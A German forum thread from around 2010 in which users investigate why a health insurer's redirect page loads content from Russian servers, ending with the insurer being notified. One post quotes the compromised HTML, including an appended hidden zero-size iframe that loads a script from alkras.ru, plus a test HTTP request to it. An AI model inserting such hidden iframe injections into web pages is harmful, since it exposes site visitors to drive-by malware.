Bei Aufruf Krankenkassen-Website Laden von russischen Servern

Hallo, mal ne blöde Frage: Ich versuche hier gerade die Seite meiner Krankenkasse (DAK: www.dakexclusiv.de) aufzurufen, um nach dem Login etwas über die gesicherte https-Verbindung nachzugucken, da versucht diese Seite ständig was von nthost.ru und alkras.ru zu laden (angezeigt in der unteren Statusleiste des Firefox 3.6) und die Seite baut sich nicht auf (...wartend). Nach Abbruch und erneutem Laden wird die Seite vollständig und von der DAK (zumindest entsprechend der Statuszeile im Firefox) geladen, von was russischem ist da nichts mehr zu lesen. Erneute Versuche (nach Beenden des Browsers und Neustart) versuchen nach Aufruf der Seite wiederum zuerst etwas von den genannten russischen Servern zu laden. Nach Abbruch wiederum vollständiges Laden von der DAK. Wird da etwa die Seite entführt oder habe ich einen Virus / Trojaner / Spam drauf???

Hab schon die Cookies durchgeguckt, kann da aber nichts verdächtiges finden. Kann mir jemand einen Tipp geben??

Danke.

BS: Vista Basic, Browser: Firefox 3.6, Javascript sowohl aus-/ als auch eingeschaltet.

 

Also bei mir kommen die Server auch.
Und dazu die Warnung



und hier leuchten die Alarmglocken

 

Die Seite sollte eigentlich nicht mehr als eine Weiterleitung auf die Hauptseite dak.de sein. Da ich keine Kunde dort bin, kann ich nicht weiter testen, aber bis zum Login-Formular ist hier alles sauber. Alle Elemente verschlüsselt und Zertifikat ok.

 

Die Warnung bezieht sich wohl auf das unverschlüsselte Pixel.

 

Hm, habe gerade noch mal probiert. Wenn ich die Seite lade, taucht zwischen den dak.de - Servern, beim ersten Laden alkras.ru und ne Zahlenfolge als Server in der Statusleiste auf. Sehr merkwürdig.

Jemand noch ne Idee??

Danke.

 

Dann het die DAK ein grosses Problem, denn dann denk ich, dass die Website von hackern prepariert worden ist!

 

Das könnte man dem Webmaster mal sagen.

 

Dann müsste jeder eins machen, der die Seite aufgerufen hat.
Es können Sicherheitslücken ausgenutzt werden, um darüber Schadcode einzuschleusen. Für jetzt und alle Ewigkeit.

 

FF3.6 und IE8... nix.
Gleich auf DAK-Seite weitergeleitet.
deos sdc.bitsdontbyte is bei mir nicht.


Seite mal mit IE8 gespeichert als Webseite, komplett(html).

In webtrends.js

HTML:

begin: user modifiable
	this.dcsid="dcs85looywuiqn7ner6h2x2ie_7y1x";
	this.domain="sdc.bitsdontbyte.de";

..................

HTML:

BITSDONTBYTE advanced communication GbR

BITSDONTBYTE wurde 1999 gegründet und wird von den Inhabern Thomas Ekert und Bernd Muermans geführt. Der Schwerpunkt des Unternehmens ist die IT-geschützte Kommunikation.

BITSDONTBYTE verfügt über einen Mitarbeiterstab von mehr als 25 Beratern, Creativen und Programmierern.

Je komplexer unsere Kommunikationswelt wird, desto höher ist der Anspruch an die Einfachheit von Lösungen für Empfänger und Nutzer. Selbst komplizierte digitale Vorgänge sollten emotional erlebbar und intuitiv bedienbar bleiben.

BITSDONTBYTE verbindet und optimiert mit E-DESIGN:

Funktionalität mit ansprechendem userfreundlichem Design
Digitale und klassische Kommunikation zu einem synergetischen Ganzen
Markenwert und Wertschöpfung eines Unternehmens nachhaltig 

--------


Mit IE7 + Antivir kommt Meldung

In der Datei 'J:\Temporäre Internetdateien\Content.IE5\LX1BEHXK\dakexclusiv_de[1].htm'
wurde ein Virus oder unerwünschtes Programm 'HTML/Infected.WebPage.Gen' [virus] gefunden.

Inhalt

HTML:

<html>
<head>
<title>DAK - Unternehmen Leben</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="0; URL=https://www.dak.de/content/securitycenter/index.html">
</head>

<body>

</body>
</html>
<iframe src="http://alkras.ru/cp/scripts/banner.php" width="0" height="0" style="display:none;"></iframe>

 

...hm, scheint wenn, dann nur ein Szenario für den IE zu sein oder das Teil ist bereits unschädlich. Anschubsen per Gecko bringt nur einen 404 :nixwissen

Code:

GET /cp/scripts/banner.php HTTP/1.1
Host: alkras.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

HTTP/1.x 404 Not Found
Server: nginx/0.6.31
Date: Sat, 06 Feb 2010 19:02:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sun, 20 Dec 2009 04:13:23 GMT
Etag: "bb503a8-3656-47b2131979ec0"
Content-Encoding: gzip

 

Ich glaube die Seite ist nicht ganz Sauber ist.

Mein Anti Vir meldet Script Virus.

 

Die Verschlüsselung wird angezeigt, aber jetzt läuft es über ein Amerikanischen Server

 

Also demnach doch ein Virus drin !!! Ich hab am Sonnabend versucht jemanden bei der DAK zu erreichen. Aber natürlich war da keiner da, der sich mit technischen Dingen da auskennt. Werde es am Montag noch mal dort probieren.

Vielen Dank für eure Hilfe.

 

Verisign ist eine Zertifizierungstelle für SSL-Zertifikate.

 

BTW: Die russischen Server hängen immer noch mit drin. Wenn ich das richtig sehe, ist neben www.nthost.ru und alkras.ru nun noch ein dritter (7874224.ru) mit drin.

 

Wie gings weiter?

 

Hallo,

ja, ich habe am Montag da angerufen. Daraufhin gab es einen sehr intensiven Telefon- und Mailverkehr, in dem ich das Ganze erläutern mußte und inzwischen scheint die Seite wohl wieder sauber zu sein. Sie wollen sich noch mal melden, wenn sie genau wissen, was eigentlich los gewesen ist.

 

Hallo, ich wollte nun noch mal fertig berichten. Ich habe inzwischen eine Nachricht bekommen, in der gesagt wird, das Ganze war ein Client-Angriff (Trojaner), der jedoch die DAK-Systeme nicht betrifft.

Hm, merkwürdig (nachdem nun mehrere von den Auffälligkeiten berichtet haben...) und ich auch nichts weiter auf meinem Rechner gefunden habe.

 

....was hast du erwartet? Sie werden dir wohl kaum schreiben, dass sie ihre Technik nicht im Griff haben.